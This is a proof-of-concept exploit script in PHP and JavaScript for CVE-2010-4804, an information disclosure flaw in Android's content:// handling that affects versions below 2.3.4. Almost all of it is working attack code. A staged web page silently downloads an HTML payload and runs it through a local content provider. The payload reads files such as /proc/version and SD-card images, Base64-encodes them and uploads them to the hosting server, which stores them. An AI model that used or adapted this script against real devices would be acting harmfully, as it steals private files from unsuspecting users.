Android content:// Information Disclosure

`<?php  
/*  
* Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities  
* Bugtraq ID: 48256  
* CVE: CVE-2010-4804  
* Affected: Android < 2.3.4  
* Author: Thomas Cannon  
* Discovered: 18-Nov-2010  
* Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/  
*  
* Filename: poc.php  
* Instructions: Specify files you want to upload in filenames array. Host this php file  
* on a server and visit it using the Android Browser. Some builds of Android  
* may require adjustments to the script, for example when a German build was  
* tested it downloaded the payload as .htm instead of .html, even though .html  
* was specified.  
*  
* Tested on: HTC Desire (UK Version) with Android 2.2  
*/  
  
// List of the files on the device that we want to upload to our server  
$filenames = array("/proc/version","/sdcard/img.jpg");  
  
// Determine the full URL of this script  
$protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";  
$scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];  
  
// Stage 0: Display introduction text and a link to start the PoC.  
function stage0($scripturl) {  
echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>";  
}  
  
// Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect  
// to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the  
// context of the local device - this is the vulnerability.  
function stage1($scripturl) {  
echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">";  
}  
  
// Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.  
// The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).  
function stage2($scripturl,$filenames) {  
header("Cache-Control: public");  
header("Content-Description: File Transfer");  
header("Content-Disposition: attachment; filename=poc.html");  
header("Content-Type: text/html");  
header("Content-Transfer-Encoding: binary");  
?>  
<html>  
<body>  
<script language='javascript'>  
var filenames = Array('<?php echo implode("','",$filenames); ?>');  
var filecontents = new Array();  
function processBinary(xmlhttp) {  
data = xmlhttp.responseText; r = ''; size = data.length;  
for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff);  
return r;  
}  
function getFiles(filenames) {  
for (var filename in filenames) {  
filename = filenames[filename];  
xhr = new XMLHttpRequest();  
xhr.open('GET', filename, false);  
xhr.overrideMimeType('text/plain; charset=x-user-defined');  
xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } }  
xhr.send();  
}  
}  
function addField(form, name, value) {  
var fe = document.createElement('input');  
fe.setAttribute('type', 'hidden');  
fe.setAttribute('name', name);  
fe.setAttribute('value', value);  
form.appendChild(fe);  
}  
function uploadFiles(filecontents) {  
var form = document.createElement('form');  
form.setAttribute('method', 'POST');  
form.setAttribute('enctype', 'multipart/form-data');  
form.setAttribute('action', '<?=$scripturl?>?stage=3');  
var i = 0;  
for (var filename in filecontents) {  
addField(form, 'filename'+i, btoa(filename));  
addField(form, 'data'+i, filecontents[filename]);  
i += 1;  
}  
document.body.appendChild(form);  
form.submit();  
}  
getFiles(filenames);  
uploadFiles(filecontents);  
</script>  
</body>  
</html>  
<?php  
}  
  
// Stage 3: Read the file names and contents sent by the payload and write to a file on the server.  
function stage3() {  
$fp = fopen("files.txt", "w") or die("Couldn't open file for writing!");  
fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!");  
fclose($fp);  
echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";  
}  
  
// Select the stage to run depending on the parameter passed in the URL  
switch($_GET["stage"]) {  
case "1":  
stage1($scripturl);  
break;  
case "2":  
stage2($scripturl,$filenames);  
break;  
case "3":  
stage3();  
break;  
default:  
stage0($scripturl);  
break;  
}  
?>  
  
  
`